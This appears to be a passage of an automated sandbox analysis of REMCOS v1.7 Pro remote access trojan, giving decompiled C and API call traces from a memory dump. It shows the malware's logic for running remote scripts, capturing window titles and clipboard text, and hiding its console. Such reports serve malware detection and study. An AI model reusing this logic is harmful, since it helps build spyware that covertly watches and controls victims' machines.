                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                            • Part of subcall function 0040D20D: getenv.MSVCRT ref: 0040D234
                                            • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                            • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                            • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                            • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                            • Part of subcall function 0040D20D: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                            • Part of subcall function 0040D20D: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                            • Part of subcall function 0040D20D: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                                            • Part of subcall function 0040D20D: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                            • Part of subcall function 0040D20D: ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                            • Part of subcall function 0040D20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                            • Part of subcall function 0040D20D: CloseHandle.KERNEL32(?), ref: 0040D328
                                            • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                            • Part of subcall function 0040D20D: DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                            • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                            • Part of subcall function 0040D20D: ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D459
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$D@1@@D@std@@@std@@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@D@2@@0@$CloseHandleHstd@@V12@$??0?$basic_ofstream@??4?$basic_string@??6std@@??8std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteEventExecuteFileObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                          • String ID: exec
                                          • API String ID: 1002160170-3144634053
                                          • Opcode ID: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                                          • Instruction ID: 2a1242b9f6ee79d5d393efb9909d70216f0b734506a354a1a0805bdd98583fd6
                                          • Opcode Fuzzy Hash: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                                          • Instruction Fuzzy Hash: 89213072910119ABCF04BBE5DC5E9EE7B78FF14305F004469F912A20E1EE785988CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 00409509
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                          • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                          • API String ID: 2054586871-62392802
                                          • Opcode ID: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                                          • Instruction ID: d777f3dda36179113423a7ed30754d26adfb0a2fc6db248441cd5d77bc2a580d
                                          • Opcode Fuzzy Hash: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                                          • Instruction Fuzzy Hash: 0501C43B58422A73CE059AD5EC15AD927088B053A5F2000B7AA00F75D2CE7CDEC98BC9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040C8F3(struct HWND__* _a4, char _a7) {
                                          				char _v16;
                                          				char _v32;
                                          				char _v48;
                                          				char _v64;
                                          				char _v80;
                                          				char _v96;
                                          				short _v696;
                                          				void* _t24;
                                          				char* _t33;
                                          				char* _t34;
                                          				char* _t35;
                                          
                                          				GetWindowTextW(_a4,  &_v696, 0x12c);
                                          				if(IsWindowVisible(_a4) != 0 && _v696 != 0) {
                                          					sprintf( &_v16, 0x411734, _a4);
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v696,  &_a7);
                                          					_t33 =  &_v64;
                                          					L0040FC20();
                                          					_t34 =  &_v48;
                                          					L0040FC20();
                                          					_t35 =  &_v96;
                                          					L0040FC20();
                                          					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t35, _t35, _t34, _t34, _t33, _t33, E0040EDD3( &_v80,  &_v32), 0x41171c,  &_v16, 0x411728);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				}
                                          				_t24 = 1;
                                          				return _t24;
                                          			}


                                          APIs
                                          • GetWindowTextW.USER32 ref: 0040C90B
                                          • IsWindowVisible.USER32(?), ref: 0040C914
                                          • sprintf.MSVCRT ref: 0040C93C
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040C953
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0041171C,?,00411728), ref: 0040C97B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00411728), ref: 0040C988
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00411728), ref: 0040C995
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00411728), ref: 0040C9A3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9BE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9C7
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9D0
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V10@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V01@@Window$D@1@@G@1@@TextV01@VisibleY?$basic_string@sprintf
                                          • String ID:
                                          • API String ID: 1029694555-0
                                          • Opcode ID: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                                          • Instruction ID: 4e002e25e0f648f437be034c291f2efbcbeefca2187121b50d5874a0224bd0e6
                                          • Opcode Fuzzy Hash: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                                          • Instruction Fuzzy Hash: 7621DA72D4010EABDF14ABA0EC8DDDE777DAB14308F008476F516A21A1EB7896898B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E5F6
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7), ref: 0040E609
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E613
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E61C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E635
                                            • Part of subcall function 0040EED4: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,7313CB00,?,?,0040E644,?), ref: 0040EEE3
                                            • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                            • Part of subcall function 0040EED4: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                            • Part of subcall function 0040EED4: ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                            • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                            • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                            • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E64B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E654
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E661
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E66A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@D@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                          • String ID: .exe$http\shell\open\command
                                          • API String ID: 1097156965-4091164470
                                          • Opcode ID: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                                          • Instruction ID: c33ef1c1da018883c7c7ab6d04285324c3d84ed8a02606c642186c54a30d9d8b
                                          • Opcode Fuzzy Hash: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                                          • Instruction Fuzzy Hash: EF11F17190011EABDF04EBE0DC4DFEE7778FB14305F444469F512A21A1EEB8A548CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E00405142(void* __ecx) {
                                          				char _v5;
                                          				char _v24;
                                          				char _v40;
                                          				char* _t13;
                                          				void* _t18;
                                          				void* _t34;
                                          
                                          				_t18 = __ecx;
                                          				if(( *0x4156b8 & 0x00000001) == 0) {
                                          					 *0x4156b8 =  *0x4156b8 | 0x00000001;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          					E0040FCBA(E00405201);
                                          				}
                                          				E004050FC(_t18,  &_v24);
                                          				_t13 =  &_v24;
                                          				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x4156a8);
                                          				if(_t13 == 0) {
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                          					_t13 =  &_v24;
                                          					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x410668);
                                          					if(_t13 != 0) {
                                          						L0040FC1A();
                                          						L0040FC20();
                                          						_t13 = E00403A9A(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x4156a8);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                          					}
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t13;
                                          			}

                                          0x00405152
                                          0x00405159
                                          0x0040515b
                                          0x00405168
                                          0x00405173
                                          0x00405178
                                          0x0040517f
                                          0x00405189
                                          0x0040518e
                                          0x00405198
                                          0x004051a0
                                          0x004051a6
                                          0x004051af
                                          0x004051b9
                                          0x004051d1
                                          0x004051db
                                          0x004051e5
                                          0x004051ed
                                          0x004051ed
                                          0x004051b9
                                          0x004051f6
                                          0x00405200

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405168
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004156A8,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 0040518E
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404196), ref: 004051A0
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00404196), ref: 004051AF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],004156A8,[End of clipboard text]), ref: 004051D1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 004051DB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 004051ED
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404196), ref: 004051F6
                                          Strings
                                          • [Following text has been copied to clipboard:], xrefs: 004051CB
                                          • [End of clipboard text], xrefs: 004051C5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                          • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                          • API String ID: 1191203583-3441917614
                                          • Opcode ID: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                                          • Instruction ID: 00a8ace4b862f7325ec407ea538c2c3054ea5e1f5129ba08377fdacfa38d8bab
                                          • Opcode Fuzzy Hash: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                                          • Instruction Fuzzy Hash: 5911B731A002099BCB00E7A4ED4EEEF3B6CDB84315F10007BF405B2181DE788D89876D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00402646(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t23;
                                          				char* _t24;
                                          				intOrPtr _t33;
                                          				void* _t35;
                                          				intOrPtr _t40;
                                          
                                          				_t35 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x34)) != 0) {
                                          					return 0;
                                          				}
                                          				_t40 =  *0x415938; // 0x0
                                          				_t33 = _a4;
                                          				if(_t40 != 0) {
                                          					GetLocalTime( &_v20);
                                          					_t23 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t23, "Enabled! (Timeout: %i seconds)\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t33);
                                          					_t24 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t24, _t23);
                                          					printf(_t24);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *((char*)(_t35 + 0x34)) = 1;
                                          				 *((intOrPtr*)(_t35 + 0x38)) = _t33;
                                          				CreateThread(0, 0, E00402823, _t35, 0, 0);
                                          				return 1;
                                          			}

                                          0x0040264e
                                          0x00402655
                                          0x00000000
                                          0x004026ea
                                          0x0040265b
                                          0x00402662
                                          0x00402665
                                          0x0040266b
                                          0x00402689
                                          0x00402697
                                          0x0040269e
                                          0x004026a2
                                          0x004026ac
                                          0x004026b3
                                          0x004026bf
                                          0x004026c8
                                          0x004026c8
                                          0x004026d8
                                          0x004026dc
                                          0x004026df
                                          0x00000000

                                          APIs
                                          • GetLocalTime.KERNEL32(?,758EFF80,00415A30,7313CB00,?,?,?,?,?,?,?,?,?,?,?,0040A950), ref: 0040266B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Enabled! (Timeout: %i seconds),?,?,0040A950,?,?), ref: 00402697
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026A2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026AC
                                          • printf.MSVCRT ref: 004026B3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                                          • CreateThread.KERNEL32 ref: 004026DF
                                          Strings
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402692
                                          • Enabled! (Timeout: %i seconds), xrefs: 0040268C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Enabled! (Timeout: %i seconds)
                                          • API String ID: 3715082883-3146830426
                                          • Opcode ID: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                                          • Instruction ID: 79c03f263a9eabdf1fe5f6b3bc6f9ebe40ce7b552af33f5414839a7309894a53
                                          • Opcode Fuzzy Hash: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                                          • Instruction Fuzzy Hash: F01186B2501218BFCB509BE4DD8DCFFB7BCAA44714B004477F542A2190DAB9A984C778
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E0040FAED(signed int __edx, intOrPtr _a4) {
                                          				void _v1003;
                                          				char _v1004;
                                          				struct HWND__* _t13;
                                          				signed int _t34;
                                          				signed int _t36;
                                          				unsigned int _t40;
                                          				signed int _t41;
                                          				signed int _t47;
                                          				signed int _t50;
                                          				signed int _t56;
                                          				signed int _t59;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				void* _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t64 = __edx;
                                          				AllocConsole();
                                          				_t13 =  *0x415ba8();
                                          				 *0x415bac = _t13;
                                          				if(_a4 == 0) {
                                          					ShowWindow(_t13, 0);
                                          				}
                                          				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                          				_v1004 = 0;
                                          				memset( &_v1003, 0, 0xf9 << 2);
                                          				asm("stosw");
                                          				asm("stosb");
                                          				_t65 = _t64 | 0xffffffff;
                                          				asm("repne scasb");
                                          				_t40 =  !_t65;
                                          				_t91 = " * REMCOS v" - _t40;
                                          				_t41 = _t40 >> 2;
                                          				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t47 =  !_t65;
                                          				_t92 = "1.7 Pro" - _t47;
                                          				_t34 = _t47;
                                          				asm("repne scasb");
                                          				_t50 = _t34 >> 2;
                                          				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                          				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                          				asm("repne scasb");
                                          				_t56 =  !_t65;
                                          				_t93 = "\n * Breaking-Security.Net\n\n" - _t56;
                                          				_t36 = _t56;
                                          				asm("repne scasb");
                                          				_t59 = _t36 >> 2;
                                          				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                          				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                          				return printf( &_v1004);
                                          			}

                                          0x0040faed
                                          0x0040faf9
                                          0x0040faff
                                          0x0040fb07
                                          0x0040fb0f
                                          0x0040fb13
                                          0x0040fb13
                                          0x0040fb2c
                                          0x0040fb3f
                                          0x0040fb45
                                          0x0040fb47
                                          0x0040fb49
                                          0x0040fb4a
                                          0x0040fb56
                                          0x0040fb58
                                          0x0040fb64
                                          0x0040fb6e
                                          0x0040fb7a
                                          0x0040fb83
                                          0x0040fb85
                                          0x0040fb89
                                          0x0040fb8d
                                          0x0040fb91
                                          0x0040fb96
                                          0x0040fb99
                                          0x0040fba6
                                          0x0040fbaf
                                          0x0040fbb1
                                          0x0040fbb5
                                          0x0040fbb9
                                          0x0040fbbd
                                          0x0040fbc2
                                          0x0040fbc5
                                          0x0040fbd3
                                          0x0040fbe2

                                          APIs
                                          • AllocConsole.KERNEL32(74B043E0,00000000,00415940), ref: 0040FAF9
                                          • GetConsoleWindow.KERNEL32 ref: 0040FAFF
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040FB13
